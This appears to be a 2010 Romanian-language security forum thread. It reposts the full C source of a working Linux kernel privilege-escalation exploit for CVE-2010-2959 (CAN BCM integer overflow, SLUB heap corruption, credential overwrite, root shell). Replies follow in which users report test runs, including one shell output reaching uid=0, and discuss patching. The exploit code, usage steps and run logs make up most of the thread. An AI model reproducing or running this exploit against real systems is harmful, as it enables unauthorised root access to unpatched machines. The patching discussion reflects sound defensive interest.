Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit

Nytro · August 27, 2010

Il mai incearca cineva? Nu merge la mine, "Symbol table not available, aborting".

/*
 * i-CAN-haz-MODHARDEN.c
 *
 * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
 *
 *   Ben Hawkes discovered an integer overflow in the Controller Area Network
 *   (CAN) subsystem when setting up frame content and filtering certain
 *   messages. An attacker could send specially crafted CAN traffic to crash
 *   the system or gain root privileges.
 *
 * Usage:
 *
 *   $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
 *   $ ./i-can-haz-modharden
 *   ...
 *   [+] launching root shell!
 *   # id
 *   uid=0(root) gid=0(root)
 *
 * Notes:
 *
 *   The allocation pattern of the CAN BCM module gives us some desirable
 *   properties for smashing the SLUB. We control the kmalloc with a 16-byte
 *   granularity allowing us to place our allocation in the SLUB cache of our
 *   choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for
 *   old-times sake). The allocation can also be made in its own discrete
 *   stage before the overwrite which allows us to be a bit more conservative
 *   in ensuring the proper layout of our SLUB cache.
 *
 *   To exploit the vulnerability, we first create a BCM RX op with a crafted
 *   nframes to trigger the integer overflow during the kmalloc. On the second
 *   call to update the existing RX op, we bypass the E2BIG check since the
 *   stored nframes in the op is large, yet has an insufficiently sized
 *   allocation associated with it. We then have a controlled write into the
 *   adjacent shmid_kernel object in the 96-byte SLUB cache.
 *
 *   However, while we control the length of the SLUB overwrite via a
 *   memcpy_fromiovec operation, there exists a memset operation that directly
 *   follows which zeros out last_frames, likely an adjacent allocation, with
 *   the same malformed length, effectively nullifying our shmid smash. To
 *   work around this, we take advantage of the fact that copy_from_user can
 *   perform partial writes on x86 and trigger an EFAULT by setting up a
 *   truncated memory mapping as the source for the memcpy_fromiovec operation,
 *   allowing us to smash the necessary amount of memory and then pop out and
 *   return early before the memset operation occurs.
 *
 *   We then perform a dry-run and detect the shmid smash via an EIDRM errno
 *   from shmat() caused by an invalid ipc_perm sequence number. Once we're
 *   sure we have a shmid_kernel under our control we re-smash it with the
 *   malformed version and redirect control flow to our credential modifying
 *   calls mapped in user space.
 *
 *   Distros: please use grsecurity's MODHARDEN or SELinux's module_request
 *   to restrict unprivileged loading of uncommon packet families. Allowing
 *   the loading of poorly-written PF modules just adds a non-trivial and
 *   unnecessary attack surface to the kernel.
 *
 *   Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports
 *   easily to other vulnerable kernels/distros. Careful, it could use some
 *   post-exploitation stability love as well.
 *
 *   Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that
 *   this exploit borrows code from.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif

#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
    sa_family_t can_family;
    int can_ifindex;
    union {
        struct { uint32_t rx_id, tx_id; } tp;
    } can_addr;
};

struct can_frame {
    uint32_t can_id;
    uint8_t can_dlc;
    uint8_t data[8] __attribute__((aligned(8)));
};

struct bcm_msg_head {
    uint32_t opcode;
    uint32_t flags;
    uint32_t count;
    struct timeval ival1, ival2;
    uint32_t can_id;
    uint32_t nframes;
    struct can_frame frames[0];
};

#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
    struct list_head *next;
    struct list_head *prev;
};

struct super_block {
    struct list_head s_list;
    unsigned int s_dev;
    unsigned long s_blocksize;
    unsigned char s_blocksize_bits;
    unsigned char s_dirt;
    uint64_t s_maxbytes;
    void *s_type;
    void *s_op;
    void *dq_op;
    void *s_qcop;
    void *s_export_op;
    unsigned long s_flags;
} super_block;

struct mutex {
    unsigned int count;
    unsigned int wait_lock;
    struct list_head wait_list;
    void *owner;
};

struct inode {
    struct list_head i_hash;
    struct list_head i_list;
    struct list_head i_sb_list;
    struct list_head i_dentry_list;
    unsigned long i_ino;
    unsigned int i_count;
    unsigned int i_nlink;
    unsigned int i_uid;
    unsigned int i_gid;
    unsigned int i_rdev;
    uint64_t i_version;
    uint64_t i_size;
    unsigned int i_size_seqcount;
    long i_atime_tv_sec;
    long i_atime_tv_nsec;
    long i_mtime_tv_sec;
    long i_mtime_tv_nsec;
    long i_ctime_tv_sec;
    long i_ctime_tv_nsec;
    uint64_t i_blocks;
    unsigned int i_blkbits;
    unsigned short i_bytes;
    unsigned short i_mode;
    unsigned int i_lock;
    struct mutex i_mutex;
    unsigned int i_alloc_sem_activity;
    unsigned int i_alloc_sem_wait_lock;
    struct list_head i_alloc_sem_wait_list;
    void *i_op;
    void *i_fop;
    struct super_block *i_sb;
    void *i_flock;
    void *i_mapping;
    char i_data[84];
    void *i_dquot_1;
    void *i_dquot_2;
    struct list_head i_devices;
    void *i_pipe_union;
    unsigned int i_generation;
    unsigned int i_fsnotify_mask;
    void *i_fsnotify_mark_entries;
    struct list_head inotify_watches;
    struct mutex inotify_mutex;
} inode;

struct dentry {
    unsigned int d_count;
    unsigned int d_flags;
    unsigned int d_lock;
    int d_mounted;
    void *d_inode;
    struct list_head d_hash;
    void *d_parent;
} dentry;

struct file_operations {
    void *owner;
    void *llseek;
    void *read;
    void *write;
    void *aio_read;
    void *aio_write;
    void *readdir;
    void *poll;
    void *ioctl;
    void *unlocked_ioctl;
    void *compat_ioctl;
    void *mmap;
    void *open;
    void *flush;
    void *release;
    void *fsync;
    void *aio_fsync;
    void *fasync;
    void *lock;
    void *sendpage;
    void *get_unmapped_area;
    void *check_flags;
    void *flock;
    void *splice_write;
    void *splice_read;
    void *setlease;
} op;

struct vfsmount {
    struct list_head mnt_hash;
    void *mnt_parent;
    void *mnt_mountpoint;
    void *mnt_root;
    void *mnt_sb;
    struct list_head mnt_mounts;
    struct list_head mnt_child;
    int mnt_flags;
    const char *mnt_devname;
    struct list_head mnt_list;
    struct list_head mnt_expire;
    struct list_head mnt_share;
    struct list_head mnt_slave_list;
    struct list_head mnt_slave;
    struct vfsmount *mnt_master;
    struct mnt_namespace *mnt_ns;
    int mnt_id;
    int mnt_group_id;
    int mnt_count;
} vfsmount;

struct file {
    struct list_head fu_list;
    struct vfsmount *f_vfsmnt;
    struct dentry *f_dentry;
    void *f_op;
    unsigned int f_lock;
    unsigned long f_count;
} file;

struct kern_ipc_perm {
    unsigned int lock;
    int deleted;
    int id;
    unsigned int key;
    unsigned int uid;
    unsigned int gid;
    unsigned int cuid;
    unsigned int cgid;
    unsigned int mode;
    unsigned int seq;
    void *security;
};

struct shmid_kernel {
    struct kern_ipc_perm shm_perm;
    struct file *shm_file;
    unsigned long shm_nattch;
    unsigned long shm_segsz;
    time_t shm_atim;
    time_t shm_dtim;
    time_t shm_ctim;
    unsigned int shm_cprid;
    unsigned int shm_lprid;
    void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret = 0, oldstyle;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            return 0;
        oldstyle = 1;
    }

    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                    continue;
                }
                p = strrchr(sname, '_');
                if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_') {
                        p--;
                    }
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);

    return 0;
}

int
check_slabinfo(char *cache, int *active_out, int *total_out)
{
    FILE *fp;
    char name[64], slab[256];
    int active, total, diff;

    memset(slab, 0, sizeof(slab));
    memset(name, 0, sizeof(name));

    fp = fopen("/proc/slabinfo", "r");
    if (!fp) {
        printf("[-] sorry, /proc/slabinfo is not available!");
        exit(1);
    }

    fgets(slab, sizeof(slab) - 1, fp);
    while (1) {
        fgets(slab, sizeof(slab) - 1, fp);
        sscanf(slab, "%s %u %u", name, &active, &total);
        diff = total - active;
        if (strcmp(name, cache) == 0) {
            break;
        }
    }
    fclose(fp);

    if (active_out) {
        *active_out = active;
    }
    if (total_out) {
        *total_out = total;
    }
    return diff;
}

void
trigger(void)
{
    int *shmids;
    int i, ret, sock, cnt, base, smashed;
    int diff, active, total, active_new, total_new;
    int len, sock_len, mmap_len;
    struct sockaddr_can addr;
    struct bcm_msg_head *msg;
    void *efault;
    char *buf;

    printf("[+] creating PF_CAN socket...\n");

    sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
    if (sock < 0) {
        printf("[-] kernel lacks CAN packet family support\n");
        exit(1);
    }

    printf("[+] connecting PF_CAN socket...\n");

    memset(&addr, 0, sizeof(addr));
    addr.can_family = PF_CAN;

    ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
    if (sock < 0) {
        printf("[-] could not connect CAN socket\n");
        exit(1);
    }

    len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
    msg = malloc(len);
    memset(msg, 0, len);
    msg->can_id = 2959;
    msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

    printf("[+] clearing out any active OPs via RX_DELETE...\n");

    msg->opcode = RX_DELETE;
    ret = send(sock, msg, len, 0);

    printf("[+] removing any active user-owned shmids...\n");

    system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");

    printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n");

    diff = check_slabinfo(SLUB, &active, &total);

    shmids = malloc(sizeof(int) * diff * 10);

    cnt = diff * 10;
    for (i = 0; i < cnt; ++i) {
        diff = check_slabinfo(SLUB, &active, &total);
        if (diff == 0) {
            break;
        }
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
    }
    base = i;

    if (diff != 0) {
        printf("[-] inconsistency detected with SLUB cache allocation, please try again\n");
        exit(1);
    }

    printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n");

    i = base;
    cnt = i + FILLER;
    for (; i < cnt; ++i) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
    }

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, len, 0);
    if (ret < 0) {
        printf("[-] kernel rejected malformed CAN header\n");
        exit(1);
    }

    i = base + FILLER;
    cnt = i + FILLER;
    for (; i < cnt; ++i) {
        shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
    }

    printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n");

    mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
    sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
    efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault);

    printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n");

    msg = (struct bcm_msg_head *) efault;
    memset(msg, 0, mmap_len);
    msg->can_id = 2959;
    msg->nframes = (ALLOCATION / 16) * 4;

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, mmap_len, 0);
    if (ret != -1 && errno != EFAULT) {
        printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
        exit(1);
    }

    printf("[+] seeking out the smashed shmid_kernel...\n");

    i = base;
    cnt = i + FILLER + FILLER;
    for (; i < cnt; ++i) {
        ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
        if (ret == -1 && errno == EIDRM) {
            smashed = i;
            break;
        }
    }
    if (i == cnt) {
        printf("[-] could not find smashed shmid, trying running the exploit again!\n");
        exit(1);
    }

    printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]);

    printf("[+] re-smashing the shmid_kernel with exploit payload...\n");

    shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;

    buf = (char *) msg;
    memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));

    msg->opcode = RX_SETUP;
    ret = send(sock, msg, mmap_len, 0);
    if (ret != -1 && errno != EFAULT) {
        printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
        exit(1);
    }

    ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
    if (ret == -1 && errno != EIDRM) {
        setresuid(0, 0, 0);
        setresgid(0, 0, 0);

        printf("[+] launching root shell!\n");

        execl("/bin/bash", "/bin/bash", NULL);
        exit(0);
    }

    printf("[-] exploit failed! retry?\n");
}

void
setup(void)
{
    printf("[+] looking for symbols...\n");

    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] symbol table not availabe, aborting!\n");
    }

    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] symbol table not availabe, aborting!\n");
    }

    printf("[+] setting up exploit payload...\n");

    super_block.s_flags = 0;

    inode.i_size = 4096;
    inode.i_sb = &super_block;
    inode.inotify_watches.next = &inode.inotify_watches;
    inode.inotify_watches.prev = &inode.inotify_watches;
    inode.inotify_mutex.count = 1;

    dentry.d_count = 4096;
    dentry.d_flags = 4096;
    dentry.d_parent = NULL;
    dentry.d_inode = &inode;

    op.mmap = &kernel_code;
    op.get_unmapped_area = &kernel_code;

    vfsmount.mnt_flags = 0;
    vfsmount.mnt_count = 1;

    file.fu_list.prev = &file.fu_list;
    file.fu_list.next = &file.fu_list;
    file.f_dentry = &dentry;
    file.f_vfsmnt = &vfsmount;
    file.f_op = &op;

    shmid_kernel.shm_perm.key = IPC_PRIVATE;
    shmid_kernel.shm_perm.uid = getuid();
    shmid_kernel.shm_perm.gid = getgid();
    shmid_kernel.shm_perm.cuid = getuid();
    shmid_kernel.shm_perm.cgid = getgid();
    shmid_kernel.shm_perm.mode = -1;
    shmid_kernel.shm_file = &file;
}

int
main(int argc, char **argv)
{
    setup();
    trigger();
    return 0;
}

nytro@rst:~> uname -a
Linux rst 2.6.34-12-default #1 SMP 2010-06-29 02:39:08 +0200 i686 i686 i386 GNU/Linux

http://www.exploit-db.com/exploits/14814/

Zatarra · August 28, 2010

Probat pe Centos:

Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

Si nimic..

[+] looking for symbols...

[-] symbol table not availabe, aborting!

[+] setting up exploit payload...

[+] creating PF_CAN socket...

[-] kernel lacks CAN packet family support

[http@localhost ~]$

BTW: A mai obtinut cineva asta la compilare?

s.c: In function trigger:

s.c:544: warning: cast from pointer to integer of different size

s.c:571: warning: cast from pointer to integer of different size

pyth0n3 · August 28, 2010

Un modul este f?cut din func?ii si variabile , o data ce vine înc?rcat de c?tre un kernel linux , fiecare variabila , func?iile ?i adresa de memorie a acestora vin publicate in Kernel Simbol Table

Acest lucru se întîmpla deoarece pune la dispozi?ia a altor module noi care vor veni înc?rcate mai tîrziu de c?tre kernel posibilitatea de a folosi func?iile puse la dispozi?ie de c?tre celelalte module

Kernel Symbol Table tine cont de toate adresele de memorie puse la dispozi?ie de c?tre un modul

Am testat in Open Suse 11, Debian5 , Ubuntu 8.10, Ubuntu 9.10


[+] looking for symbols...
[-] symbol table not availabe, aborting!
[-] symbol table not availabe, aborting!
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[-] kernel lacks CAN packet family support

Nu am reu?it s? în?eleg exact problema , daca codul din exploit nu reuseste sa g?seasc? Kernel Symbol Table , nu va reu?i s? ob?in? anumite adrese de memorie de care are nevoie

Oricum din cate vad testul a fost f?cut intrun sistem Ubuntu 10 , dac? careva are posibilitatea rog s? încerce

Nu ?tiu exact cum vine configurat kernelul in Ubuntu 10, probabil va trebui modificat pu?in codul de exploit pt alte sisteme

Edit:

Tested on Debian Sqeeze 2.6.32-5-amd64

  

[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff81067fc5
[+] resolved symbol prepare_kernel_cred to 0xffffffff81067ec8
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[-] inconsistency detected with SLUB cache allocation, please try again

Edited August 28, 2010 by pyth0n3

pyth0n3 · August 29, 2010

Ubuntu 10 successful executed exploit...

Watch video online =>> Linux Kernel 2.6.32-24-generic Local exploit review

Download video =>> Here

MD5SUM 128-bit

e41512cc3644966792b84c574c869f29 linux_kernel_local_exploit.avi

Zatarra · August 29, 2010

Super. +rep pt tutorial, mie unul sincer mi-a fost lene sa incerc pe Ubuntu

Flubber · August 29, 2010

A trebuit ceva activat la Linux-ul respectiv, aditional? Patch-urile de la grsec erau? Cat despre SElinux (este si in Ubuntu? Stiu ca este in FC). Buna treaba.

Danke Nytro pentru aducere la cunostinta.

pyth0n3 · August 29, 2010

Daca se face update in ubuntu , exploit will fail , pt ca vin instalate patch-urile

Deci pt a rezolva problema treabuie dat doar un simplu

sudo apt-get update && sudo apt-get dist-upgrade

Zatarra · September 1, 2010

Probat again pe Ubuntu 10.04.1 LTS \n \l (kernel = 2.6.32-24-generic) and fail

ed3@daneel:~$ id
uid=1006(ed3) gid=1006(ed3) groups=1006(ed3)
ed3@daneel:~$ ./s
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff8108bd90
[+] resolved symbol prepare_kernel_cred to 0xffffffff8108c170
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[-] inconsistency detected with SLUB cache allocation, please try again
ed3@daneel:~$

Nytro · September 2, 2010

Probabil kernelul trebuie sa fie compilat cu anumite optiuni... :-?

pyth0n3 · September 2, 2010

Probat again pe Ubuntu 10.04.1 LTS \n \l (kernel = 2.6.32-24-generic) and fail

Cum am mai zis daca tiau facut update nu mai merge, nu conteaza versiunea de Kernel , pt ca oricum nu iti dau alta ti-au aplicat doar patch-urile

Flubber · September 2, 2010

eval@eval-laptop:/tmp/exploit$ ./expl0it
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb7859000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[150] = 6750377
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@eval-laptop:/tmp/exploit# id
uid=0(root) gid=0(root)
root@eval-laptop:/tmp/exploit#

Mie mi-a mers.

uname -a
Linux eval-laptop 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux

cat /etc/issue
Ubuntu 10.04 LTS \n \l

Deasemenea, poate sa-mi explice cineva mai exact cum functioneaza? Am inteles ideea... ce face el, dar in detaliu si usor de inteles. Cum identifica adresele de memorie in Kernel Symbol Table? Este foarte avansat (complex) din cate vad, nu ca as fi eu guru, din contra.

Later edit:

Ce este si mai ciudat asta:

apt-get update
Hit http://ftp.gts.lug.ro lucid Release.gpg
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid/multiverse Translation-en_US
Hit http://ftp.gts.lug.ro lucid-updates Release.gpg
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/multiverse Translation-en_US
Hit http://ftp.gts.lug.ro lucid-security Release.gpg
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/multiverse Translation-en_US
Hit http://ftp.gts.lug.ro lucid Release
Hit http://ftp.gts.lug.ro lucid-updates Release
Hit http://ftp.gts.lug.ro lucid-security Release
Hit http://ftp.gts.lug.ro lucid/main Packages
Hit http://ftp.gts.lug.ro lucid/restricted Packages
Hit http://ftp.gts.lug.ro lucid/main Sources
Hit http://ftp.gts.lug.ro lucid/restricted Sources
Hit http://ftp.gts.lug.ro lucid/universe Packages
Hit http://ftp.gts.lug.ro lucid/universe Sources
Hit http://ftp.gts.lug.ro lucid/multiverse Packages
Hit http://ftp.gts.lug.ro lucid/multiverse Sources
Hit http://ftp.gts.lug.ro lucid-updates/main Packages
Hit http://ftp.gts.lug.ro lucid-updates/restricted Packages
Hit http://ftp.gts.lug.ro lucid-updates/main Sources
Hit http://ftp.gts.lug.ro lucid-updates/restricted Sources
Hit http://ftp.gts.lug.ro lucid-updates/universe Packages
Hit http://ftp.gts.lug.ro lucid-updates/universe Sources
Hit http://ftp.gts.lug.ro lucid-updates/multiverse Packages
Hit http://ftp.gts.lug.ro lucid-updates/multiverse Sources
Hit http://ftp.gts.lug.ro lucid-security/main Packages
Hit http://ftp.gts.lug.ro lucid-security/restricted Packages
Hit http://ftp.gts.lug.ro lucid-security/main Sources
Hit http://ftp.gts.lug.ro lucid-security/restricted Sources
Hit http://ftp.gts.lug.ro lucid-security/universe Packages
Hit http://ftp.gts.lug.ro lucid-security/universe Sources
Hit http://ftp.gts.lug.ro lucid-security/multiverse Packages
Hit http://archive.canonical.com lucid Release.gpg
Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US
Hit http://ftp.gts.lug.ro lucid-security/multiverse Sources
Hit http://archive.canonical.com lucid Release
Hit http://archive.canonical.com lucid/partner Packages
Hit http://archive.canonical.com lucid/partner Sources
Reading package lists... Done

Bineinteles ca din "Update manager" nu pot sa updatez nimic, imi spune ca sistemul meu a fost updatat acum o ora, dar inca este vulnerabil. Am incercat inca odata exploit-ul si tot merge, nu a fost deloc patch-uit. De ce imi ignora anumite surse din repository cum ar fii:

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/main Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/restricted Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/universe Translation-en_US
Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/multiverse Translation-en_US

?

Mortii si ranitii de situatie! Am scris ditamai update-ul la post spunand cum am reusit sa patchuiesc si cand am rulat iar exploit-ul cu patch-urile bagate mi-a inghetat totul. In fine, ideea era:

- am reusit sa rezolv problema selectand "Main server" din "Software Sources" apoi m-a atentionat ca lista este out-of-date (nu stiu ce lista, parca asa mi-a zis, probabil etc/apt/sources.list) si sa-i dau reload, ceea ce am si facut

- patch-urile au fost instalate printr-un "apt-get upgrade" ce a durat putin mai mult (nu i-am mai dat upgrade si update de foarte mult timp) rezultand in:

cat /etc/issue
Ubuntu 10.04.1 LTS \n \l

# acum incerc iar exploit-ul revin cu edit sa nu imi inghete iar o.s.-ul

Edit (ce dracu?!):

eval@eval-laptop:/tmp/exploit$ ls
expl.c exploit
eval@eval-laptop:/tmp/exploit$ ./exploit
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb78d1000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[149] = 5603492
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@eval-laptop:/tmp/exploit# id
uid=0(root) gid=0(root)
root@eval-laptop:/tmp/exploit# cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
root@eval-laptop:/tmp/exploit# # WHAT THE FUCK?!
root@eval-laptop:/tmp/exploit#

?!

// Inca un apt-get upgrade:

eval@eval-laptop:/tmp/exploit$ sudo apt-get upgrade
[sudo] password for eval:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
linux-generic linux-headers-generic linux-image-generic
The following packages will be upgraded:
wget
1 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.
Need to get 289kB of archives.
After this operation, 4,096B of additional disk space will be used.
Do you want to continue [Y/n]? Y
Get:1 http://archive.ubuntu.com/ubuntu/ lucid-security/main wget 1.12-1.1ubuntu2.1 [289kB]
Fetched 289kB in 0s (610kB/s)
(Reading database ... 149534 files and directories currently installed.)
Preparing to replace wget 1.12-1.1ubuntu2 (using .../wget_1.12-1.1ubuntu2.1_i386.deb) ...
Unpacking replacement wget ...
Processing triggers for install-info ...
Processing triggers for man-db ...
Setting up wget (1.12-1.1ubuntu2.1) ...

Haha, idiotul de mine, bineinteles ca exploit-ul inca mai merge! Eu l-am stins de la buton atunci cand a inghetat o.s.-ul asa ca nu si-a mai dat upgrade cum a trebuit.

Aparent 3 pachete nu au fost instalate (din punctul meu de vedere fiind critice -- ele nemaifiind instalate exploit-ul inca mai merge).

apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
linux-generic linux-headers-generic linux-image-generic
0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.

linux-generic:
The following NEW packages will be installed:
linux-image-2.6.32-24-generic
The following packages will be upgraded:
linux-generic linux-image-generic
2 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 31.5MB of archives.
After this operation, 99.0MB of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-image-2.6.32-24-generic 2.6.32-24.42 [31.5MB]
Get:2 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-generic 2.6.32.24.25 [4,022B]
Get:3 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-image-generic 2.6.32.24.25 [4,032B]
Fetched 31.5MB in 14s (2,230kB/s)
Selecting previously deselected package linux-image-2.6.32-24-generic.
(Reading database ... 149534 files and directories currently installed.)
Unpacking linux-image-2.6.32-24-generic (from .../linux-image-2.6.32-24-generic_2.6.32-24.42_i386.deb) ...
Done.
Preparing to replace linux-generic 2.6.32.23.24 (using .../linux-generic_2.6.32.24.25_i386.deb) ...
Unpacking replacement linux-generic ...
Preparing to replace linux-image-generic 2.6.32.23.24 (using .../linux-image-generic_2.6.32.24.25_i386.deb) ...
Unpacking replacement linux-image-generic ...
Setting up linux-image-2.6.32-24-generic (2.6.32-24.42) ...
Running depmod.
update-initramfs: Generating /boot/initrd.img-2.6.32-24-generic
Running postinst hook script /usr/sbin/update-grub.
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-2.6.32-24-generic
Found initrd image: /boot/initrd.img-2.6.32-24-generic
Found linux image: /boot/vmlinuz-2.6.32-23-generic
Found initrd image: /boot/initrd.img-2.6.32-23-generic
Found linux image: /boot/vmlinuz-2.6.32-21-generic
Found initrd image: /boot/initrd.img-2.6.32-21-generic
Found memtest86+ image: /boot/memtest86+.bin
Found |bla bla| on /dev/sda1
Found |bla bla| on /dev/sda2
done
Examining /etc/kernel/postinst.d.
